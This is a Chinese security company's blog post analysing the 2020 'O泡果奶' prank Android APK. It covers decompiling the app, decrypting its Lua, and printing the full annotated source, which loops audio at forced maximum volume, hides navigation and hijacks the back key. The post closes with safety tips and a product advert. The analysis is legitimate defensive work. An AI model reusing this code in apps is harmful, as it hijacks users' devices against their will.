网盾安全 - 服务器租用、高防IP、云WAf等

值得信赖的互联网安全服务商,最新动态、新的产品促销活动分享,网络安全动态!

网络安全之“O泡果奶”事件简析

发布时间:2020-10-18 16:40:20      来源: 网盾      作者: 夶夏

10月14日左右似乎全国高校课堂都出现了O泡果奶声音,这个魔性的文件名字是叫一份礼物.apk,但是只要发送给别人安装之后,打开就会立马大声播放o泡果奶的洗脑广告。

该事件在知乎热搜榜排到第10名。

安全分析

反编译

使用apktool box对软件进行反编译得到如下文件

源码解密

通过分析AndroidManifest.xml没发现什么恶意内容

assets目录下存放了软件核心文件

打开main.lua文件时乱码,因为作者在开发时对lua进行加密,通过两次解密拿到源码。

第一次解密完还是乱码状态。

第二次使用 LuadcGUI进行解密

源码分析

源码注释分析

require("import")

import("android.app.*")

import("android.os.*")

import("android.widget.*")

import("android.view.*")

import("android.view.View")

import("android.content.Context")

import("android.media.MediaPlayer")   //播放器

import("android.media.AudioManager") //音量控制模块

import("com.androlua.Ticker")        //定时触发

activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI)

activity.getDecorView().setSystemUiVisibility(View.SYSTEM_UI_FLAG_HIDE_NAVIGATION | View.SYSTEM_UI_FLAG_IMMERSIVE)

m = MediaPlayer()

m.reset()

m.setDataSource(activity.getLuaDir() .. "/mc.mp3")  //加载mc.mp3因为文件(O泡果奶音乐)

m.prepare()

m.start()

m.setLooping(true)

ti = Ticker()  

ti.Period = 10  //间隔10ms触发

function ti.onTick()

activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI)

activity.getDecorView().setSystemUiVisibility(View.SYSTEM_UI_FLAG_HIDE_NAVIGATION | View.SYSTEM_UI_FLAG_IMMERSIVE)

end

ti.start()

function onKeyDown(A0_0, A1_1)    //劫持按键

if string.find(tostring(A1_1), "KEYCODE_BACK") ~= nil then   //劫持返回按键

activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI)    //声音调大最大

end

return true

end

通过以上分析可以看出软件安装打开后,只要程序不推出就会一直播放O泡因为,关机键失灵、减音量键也失灵。

安全小提示

1、不清楚来路的软件不要装

2、软件安装到正规软件商城安装

3、提醒大家保护个人信息,不点、不传播不知名链接。

 

 

加入网盾,开启安全防护

网盾安全 高防服务器、游戏盾、DDoS高防IP、云WAF等多款安全产品

立即体验